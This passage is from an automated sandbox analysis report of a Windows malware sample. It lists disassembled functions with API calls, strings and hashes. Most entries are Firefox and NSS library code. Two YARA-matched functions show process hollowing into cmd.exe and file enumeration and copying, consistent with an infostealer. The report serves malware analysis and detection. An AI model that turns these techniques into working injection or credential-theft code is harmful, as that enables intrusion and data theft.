                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C474157
                                                                                                                                                                                            • Part of subcall function 6C476180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C476250
                                                                                                                                                                                            • Part of subcall function 6C476180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C476292
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C47441B
                                                                                                                                                                                          • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C474448
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C47484E
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474863
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474878
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C474896
                                                                                                                                                                                          • free.MOZGLUE ref: 6C47489F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3842999660-3916222277
                                                                                                                                                                                          • Opcode ID: 083073fd7b099f9c04e1c8be16c762678fc3179c69f6e4d029e71decd3abe8e7
                                                                                                                                                                                          • Instruction ID: b0153f5833b5555ec33db4960d07a6a822a0382d8128b4a0fb9b937389781106
                                                                                                                                                                                          • Opcode Fuzzy Hash: 083073fd7b099f9c04e1c8be16c762678fc3179c69f6e4d029e71decd3abe8e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AF24B74909780CFC731DF28C084A9AFBF1BF8A354F118A5ED99997711DB319896CB82
                                                                                                                                                                                          Function 6C4264C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C4264DF
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C4264F2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C426505
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C426518
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C42652B
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C42671C
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C426724
                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C42672F
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C426759
                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C426764
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C426A80
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C426ABE
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C426AD3
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C426AE8
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C426AF7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                          • API String ID: 487479824-2878602165
                                                                                                                                                                                          • Opcode ID: 355f0ec6e4058ffb2a1fdbaebf13250bd0cb61f61b1b6943182b7a441c0cd530
                                                                                                                                                                                          • Instruction ID: 68732140c4051b6fb8c84e6df8a80ea0109d2e2425881a6332f0201d12234a20
                                                                                                                                                                                          • Opcode Fuzzy Hash: 355f0ec6e4058ffb2a1fdbaebf13250bd0cb61f61b1b6943182b7a441c0cd530
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F1F1709012298FDF20DF64CC89FDAB7B5AF46319F144299E809A3781E735AE84CF90
                                                                                                                                                                                          Function 6C59AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C59ACC4
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C59ACD5
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C59ACF3
                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C59AD3B
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C59ADC8
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59ADDF
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59ADF0
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59B06A
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59B08C
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C59B1BA
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C59B27C
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C59B2CA
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C59B3C1
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59B40C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1285963562-0
                                                                                                                                                                                          • Opcode ID: c675a330f99abe1d490288b515a0d107fbf1f2f76ceaa64d66d70f14aae42835
                                                                                                                                                                                          • Instruction ID: 087a511455fcddaa810365f51632a16b1bafd5e0515c48073c1a001c500894bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: c675a330f99abe1d490288b515a0d107fbf1f2f76ceaa64d66d70f14aae42835
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9229F71904340EFFB10DF14CC44B9A77E1AF84708F2489ACE8595B7A2E772E859CB96
                                                                                                                                                                                          Function 6C51ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C51ED38
                                                                                                                                                                                            • Part of subcall function 6C4B4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4B4FC4
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6C51EF3C
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6C51EFE4
                                                                                                                                                                                            • Part of subcall function 6C5DDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4B5001,?,00000003,00000000), ref: 6C5DDFD7
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C51F087
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C51F129
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6C51F1D1
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C51F368
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                          • API String ID: 2518200370-449611708
                                                                                                                                                                                          • Opcode ID: 13030d4963e3e01d5cae9a9e91e78c96bd4d982b941aa386bddcab777d5c6d99
                                                                                                                                                                                          • Instruction ID: d8bf4993164afab61e0ff78590e4e8981c764b1d3f8951fd81c537462f1873fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 13030d4963e3e01d5cae9a9e91e78c96bd4d982b941aa386bddcab777d5c6d99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3402D2B5B083419BE7049F329C8972B36B1AFC620CF144A3CD85A97F01EB75E856C796
                                                                                                                                                                                          Function 00035B0B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00035B30
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00035B37
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00035B50
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00035B67
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A98), ref: 00035B88
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056A9C), ref: 00035BA2
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00035C86
                                                                                                                                                                                            • Part of subcall function 0003580D: _memset.LIBCMT ref: 00035845
                                                                                                                                                                                            • Part of subcall function 0003580D: _memset.LIBCMT ref: 00035856
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00035881
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0003589F
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000358B3
                                                                                                                                                                                            • Part of subcall function 0003580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000358C6
                                                                                                                                                                                            • Part of subcall function 0003580D: StrStrA.SHLWAPI(00000000), ref: 0003596A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00035CA9
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00035BC9
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00035CD8
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035CEC
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035D1A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035D2D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00035D39
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00035D56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                          • API String ID: 2636950706-2848263008
                                                                                                                                                                                          • Opcode ID: 5109443cb69d41411d3a8168ce201a54fbcc7fe7e1f813b94d2d21cbf6392ed2
                                                                                                                                                                                          • Instruction ID: a8deac166b45ccf24f15c2fb7421439ac0b3deece262e0d41c32c5c353f67271
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5109443cb69d41411d3a8168ce201a54fbcc7fe7e1f813b94d2d21cbf6392ed2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9717FB190022CABDF61EB60EC4AACD7778AF08301F4104E5F608A7152EB31AEC5CF65
                                                                                                                                                                                          Function 0002F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002F57C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,000565A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0002F5A0
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0002F5B2
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0002F5C4
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0002F5E2
                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0002F5F8
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 0002F608
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,00032D61,?,00000000), ref: 0002F627
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0002F65D
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,D744E8F4,00000004,00000000), ref: 0002F684
                                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0002F696
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 0002F69F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                          • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                          • API String ID: 3621800378-4087486346
                                                                                                                                                                                          • Opcode ID: 453797b73b91f4f1d2b1401120bc2c5bcf93fecedbdc67c1e5c90b40367d7bbe
                                                                                                                                                                                          • Instruction ID: 4da5cc7388a32634616da07fd345e0738c7f81f22df045562967643b0c4495e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 453797b73b91f4f1d2b1401120bc2c5bcf93fecedbdc67c1e5c90b40367d7bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1415772A00219AFEB108FA4DC89FEEB7B9FF48745F104064FA05EA161D775AD40CB25
                                                                                                                                                                                          Function 6C4BECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BED0A
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BEE68
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4BEF87
                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C4BEF98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4BF483
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C4BF492
                                                                                                                                                                                          • database corruption, xrefs: 6C4BF48D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                          • API String ID: 4101233201-598938438
                                                                                                                                                                                          • Opcode ID: 6b0c19f34322d8d62b4d93aed7178b9558a18a30b3bdcf908cc351d2160884a8
                                                                                                                                                                                          • Instruction ID: e0e2990560144bdbec42e786e2c749a97bd3b7d8596b9ab3c03953f22c210127
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b0c19f34322d8d62b4d93aed7178b9558a18a30b3bdcf908cc351d2160884a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3662023CA062458FEB04CF65C480F9ABBB1BF45319F18419CD8497BB92D775E886CBA1
                                                                                                                                                                                          Function 6C43D4D0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 251COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D4F2
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D50B
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: EnterCriticalSection.KERNEL32(6C49E784), ref: 6C41CFF6
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: LeaveCriticalSection.KERNEL32(6C49E784), ref: 6C41D026
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D52E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D690
                                                                                                                                                                                          • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C43D6A6
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D712
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D751
                                                                                                                                                                                          • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C43D7EA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global., xrefs: 6C43D793
                                                                                                                                                                                          • : (malloc) Error initializing arena, xrefs: 6C43D82C
                                                                                                                                                                                          • <jemalloc>, xrefs: 6C43D827
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
